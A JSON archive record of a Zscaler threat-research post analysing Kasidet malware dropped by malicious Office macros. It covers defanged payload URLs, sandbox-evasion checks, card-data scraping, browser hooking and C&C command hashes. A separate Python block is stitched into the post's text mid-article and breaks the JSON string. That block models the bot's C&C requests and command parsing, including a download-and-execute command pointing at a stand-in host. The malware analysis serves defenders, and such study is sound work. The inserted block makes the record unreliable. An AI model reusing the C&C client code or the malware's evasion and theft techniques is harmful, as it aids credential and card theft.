{
	"id": "1d06713b-c0ec-4fa0-a752-cb96bf06cc67",
	"created_at": "2026-04-06T00:20:15.068113Z",
	"updated_at": "2026-04-10T03:21:50.149574Z",
	"deleted_at": null,
	"sha1_hash": "f85f5d1061097b335243f1691a8128123c9a12a7",
	"title": "Malicious Office Files Dropping Kasidet And Dridex | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 317825,
	"plain_text": "Malicious Office Files Dropping Kasidet And Dridex | Zscaler\r\nBy Nirmal Singh\r\nPublished: 2016-01-29 · Archived: 2026-04-05 12:39:27 UTC\r\nZscaler Blog\r\nIntroduction\r\nWe have covered the Dridex banking Trojan being delivered via various campaigns involving Office documents with malicious VBA macros in the past. Over the past two weeks, however, we have seen the same malicious VBA macros used to drop the Kasidet backdoor in addition to Dridex on infected systems. These malicious Office documents are spread as attachments to spear-phishing emails, as described here. The macro inside the Office document is obfuscated, as shown in the code snapshot below.\r\n(Figure: Macro code)\r\nThe macro downloads the malware payload from a hardcoded URL. We have seen the following URLs used in the different document payloads captured for this campaign:\r\n      armandosofsalem[.]com/l9k7hg4/b4387kfd[.]exe\r\n      trinity.ad-ventures[.]es/l9k7hg4/b4387kfd[.]exe\r\n      188.226.152[.]172/l9k7hg4/b4387kfd[.]exe\r\nIn this blog, we provide a detailed analysis of the Kasidet variant spotted in this campaign.\r\nKasidet Analysis\r\nInstallation:\r\nKasidet installs itself into the %APPDATA% folder. It creates a new folder there named \"Y1FeZFVYXllb\"; this string is hardcoded in the malware. The same string is used as the mutex name and in the Registry key created to ensure persistence across system reboots.\r\nAntiVM Check:\r\nKasidet tries to detect analysis systems during execution through the following checks.\r\nIt checks for a debugger through the \"IsDebuggerPresent\" and \"CheckRemoteDebuggerPresent\" Windows APIs. It also checks for the following popular sandbox-related strings:\r\nUser name: \"MALTEST\", \"TEQUILABOOMBOOM\", \"SANDBOX\", \"VIRUS\", \"MALWARE\"\r\nFile name: \"SAMPLE\", \"VIRUS\", \"SANDBOX\"\r\nIt tries to detect Wine by checking whether kernel32.dll exports a \"wine_get_unix_file_name\" function. It detects VMware, VirtualBox, QEMU and Bochs by checking for the following registry entries (key, value name, expected content):\r\nVMware\r\n\"SOFTWARE\\VMware, Inc.\\VMware Tools\"\r\n\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port\\Scsi Bus\\Target Id\\Logical Unit Id\", \"Identifier\", \"VMware\"\r\nVirtualBox\r\n\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port\\Scsi Bus\\Target Id\\Logical Unit Id\", \"Identifier\", \"VBOX\"\r\n\"HARDWARE\\Description\\System\", \"SystemBiosVersion\", \"VBOX\"\r\n\"SOFTWARE\\Oracle\\VirtualBox Guest Additions\"\r\n\"HARDWARE\\Description\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\"\r\nQEMU\r\n\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port\\Scsi Bus\\Target Id\\Logical Unit Id\", \"Identifier\", \"QEMU\"\r\n\"HARDWARE\\Description\\System\", \"SystemBiosVersion\", \"QEMU\"\r\nBochs\r\n\"HARDWARE\\Description\\System\", \"SystemBiosVersion\", \"BOCHS\"\r\nInformation Stealing capabilities:\r\nKasidet uses the following two methods to steal information from the victim's machine:\r\n1. Memory Scraping – This allows Kasidet to steal credit card data from the memory of Point-of-Sale (POS) systems. It scans the memory of all running processes except the following processes (mostly core operating system processes):\r\nSystem\r\nsmss.exe\r\ncsrss.exe\r\nwinlogon.exe\r\nlsass.exe\r\nspoolsv.exe\r\ndevenv.exe\r\nThe stolen information is relayed back to the attacker using the following URI format:\r\nd=1\u0026id=\u0026name=\u0026type=\u0026data=\u0026p=\r\n2. Browser Hooking – This allows Kasidet to steal data from web browsers. It can inject code into Firefox, Chrome and Internet Explorer (IE). Browser names are not stored in plain text; instead this variant identifies them by the same hash function that the Carberp malware uses. The following APIs are hooked in the web browser to steal sensitive data:\r\nBrowser | API\r\nFirefox | PR_Write\r\nChrome | WSASend\r\nIE | HttpSendRequestW, InternetWriteFile\r\nThe stolen information is relayed back to the attacker using the following URI format:\r\nff=1\u0026id=\u0026name=\u0026host=\u0026form=\u0026browser=\r\nThe information stealing features of this Kasidet variant are deactivated if the system locale or UserGeoID corresponds to Russia.\r\nNetwork communication:\r\nKasidet contains a hardcoded list of Command \u0026 Control (C\u0026C) server locations. It uses the CryptStringToBinary API call to decode the embedded C\u0026C URLs (the API converts base64 or hex text to bytes), as seen below:\r\n(Figure: Kasidet C\u0026C list)\r\nUpon successful infection, Kasidet sends an HTTP POST request with the data \"enter=1\" (without quotes). All HTTP header fields (User-Agent, Content-Type and Cookie) are hardcoded in the payload itself.\r\n(Figure: Kasidet hardcoded HTTP fields)\r\nThe C\u0026C server will not return the required data if the HTTP header fields differ. The server sends a fake 404 response code and HTML data stating that the page is not found, but the C\u0026C commands are hidden inside an HTML comment tag in the response, as seen below:\r\n(Figure: Kasidet - first communication with C\u0026C)\r\nKasidet then requests additional commands from the C\u0026C server with the following POST request:\r\n(Figure: Kasidet request for additional commands)\r\nVariable | Description\r\ncmd | Command. Hardcoded in the malware payload as '1'.\r\nid | MachineGuid value fetched from the Software\\Microsoft\\Cryptography registry key\r\nname | System name\r\nos | Operating system version\r\np | Process elevation status\r\nav | Antivirus installed on the infected system\r\nv | Version of the bot. Hardcoded in the malware; the version we analysed is 4.4\r\nw | Flag indicating whether the system locale and UserGeoID is Russia\r\nLike the browser names, all command strings are stored as hashes computed with the same hash function rather than in plain text. Below are some of the important commands:\r\nCommand Hash | Description\r\n0x0E587A65 (rate) | Used in the sleep function\r\n0x089127D3 | DDoS using the HTTP protocol\r\n0xB37A84B6 | Start keylogging and screen capture threads\r\n0x089068E8 | Download and execute an additional component. The file can be a DLL, EXE or VBS.\r\n0x4A9981B7 | Search for a given process name among the processes currently running on the system\r\n0x08D26744 | Find a given file on the system and upload it to the server\r\n0xCAB1E64A | Drop a setting.bin file and change firewall settings to download and execute a plugin component\r\n0x0010E6C4 | Execute a given command using Windows cmd.exe\r\nConclusion\r\nMalicious Office document files are a popular vector for malware authors to deliver their payloads. Dridex authors have leveraged this technique for over a year, and it was interesting to see the same campaign and URLs being leveraged to deliver Kasidet payloads.
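The C&C exchange described in the Network communication section above, modelled as an added example in Python. This code is not from the Zscaler post or the Kasidet binary: the C&C host (c2.example.invalid), the header values, the argument formats and the layout of the command comment are assumptions, and the sample 404 reply is constructed for the example. It builds the two bot requests (enter=1, then the cmd=1 beacon), applies the server-side header check the post describes, and extracts commands hidden in the HTML comment of the fake 404 page, mapping them to the hash table above.

```python
# Added example (not code from the Zscaler post): a model of the Kasidet
# C&C exchange as the post describes it. The C&C host, header values,
# argument formats and the comment layout are assumptions; the post shows
# them only in screenshots. Bot = client side, server = C&C side.
import re
from urllib.parse import urlencode

CRLF = chr(13) + chr(10)  # HTTP line terminator (CR LF)

# Assumed stand-ins for the hard-coded User-Agent, Content-Type and Cookie
# that the post says are embedded in the payload.
BOT_HEADERS = {
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': 'PHPSESSID=0123456789abcdef',
}

# Command hashes from the post. The hash function (shared with Carberp)
# is not given there, so commands are matched by hash value only.
COMMANDS = {
    0x0E587A65: 'rate',            # sleep interval
    0x089127D3: 'http_ddos',       # DDoS over HTTP
    0xB37A84B6: 'keylog_screen',   # keylogger + screen capture threads
    0x089068E8: 'download_exec',   # fetch and run a DLL/EXE/VBS
    0x4A9981B7: 'find_process',    # look for a process name
    0x08D26744: 'find_upload',     # find a file and upload it
    0xCAB1E64A: 'plugin',          # drop setting.bin, open firewall, run plugin
    0x0010E6C4: 'cmd_exec',        # run a command through cmd.exe
}


def build_request(host, path, body):
    '''Raw HTTP/1.1 POST as the bot would send it, with the fixed headers.'''
    lines = ['POST ' + path + ' HTTP/1.1', 'Host: ' + host]
    lines += [name + ': ' + value for name, value in BOT_HEADERS.items()]
    lines += ['Content-Length: ' + str(len(body)), '', body]
    return CRLF.join(lines)


def checkin_body():
    '''First request after infection: the literal body enter=1.'''
    return 'enter=1'


def beacon_body(machine_guid, host_name, os_version, elevated, av, is_russia):
    '''Second request: the cmd=1 beacon carrying the variables the post lists.'''
    return urlencode({
        'cmd': '1',                      # hard-coded command id
        'id': machine_guid,              # MachineGuid from the Cryptography key
        'name': host_name,
        'os': os_version,
        'p': '1' if elevated else '0',   # process elevation status
        'av': av,
        'v': '4.4',                      # bot version analysed in the post
        'w': '1' if is_russia else '0',  # locale/UserGeoID is Russia
    })


def server_accepts(request_headers):
    '''The C&C answers only when every hard-coded header matches exactly.'''
    return all(request_headers.get(name) == value
               for name, value in BOT_HEADERS.items())


def extract_commands(html):
    '''Commands hidden in the first HTML comment of the fake 404 page.
    Assumed layout: one line per command, <hex hash>:<argument>.'''
    match = re.search('<!--(.*?)-->', html, re.S)
    if not match:
        return []
    commands = []
    for line in match.group(1).splitlines():
        line = line.strip()
        if not line:
            continue
        hash_text, _, argument = line.partition(':')
        try:
            hash_value = int(hash_text, 16)
        except ValueError:
            continue                     # not a command line, skip it
        commands.append((COMMANDS.get(hash_value, 'unknown'), argument))
    return commands


def parse_response(raw):
    '''Split a raw HTTP response into (status code, command list).'''
    head, _, body = raw.partition(CRLF + CRLF)
    parts = head.split(CRLF)[0].split(' ')
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    return status, extract_commands(body)


# Constructed sample of the disguised 404 reply (not a real capture).
FAKE_404 = CRLF.join([
    'HTTP/1.1 404 Not Found',
    'Content-Type: text/html',
    '',
    '<html><body><h1>Not Found</h1><p>The requested URL was not found.</p>',
    '<!--',
    '0E587A65:300',
    '089068E8:http://c2.example.invalid/p/plugin.dll',
    '-->',
    '</body></html>',
])
```

Running parse_response(FAKE_404) yields (404, [('rate', '300'), ('download_exec', 'http://c2.example.invalid/p/plugin.dll')]): a proxy or IDS that only looks at the status code sees a dead page, which is the point of the disguise. A detection rule should therefore key on the fixed header values and the POST bodies (enter=1, cmd=1&id=...) rather than on the response.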
While the shared campaign and URLs do not establish any link between the authors of the two malware families, they reaffirm that a lot of the underlying infrastructure and delivery mechanisms are shared by these cyber criminals.\r\nThreatLabZ is actively monitoring this threat and ensuring signature coverage for Zscaler customers.\r\nAnalysis by - Abhay Yadav, Avinash Kumar and Nirmal Singh\r\nSource: https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
	],
	"report_names": [
		"malicious-office-files-dropping-kasidet-and-dridex"
	],
	"threat_actors": [],
	"ts_created_at": 1775434815,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f85f5d1061097b335243f1691a8128123c9a12a7.pdf",
		"text": "https://archive.orkl.eu/f85f5d1061097b335243f1691a8128123c9a12a7.txt",
		"img": "https://archive.orkl.eu/f85f5d1061097b335243f1691a8128123c9a12a7.jpg"
	}
}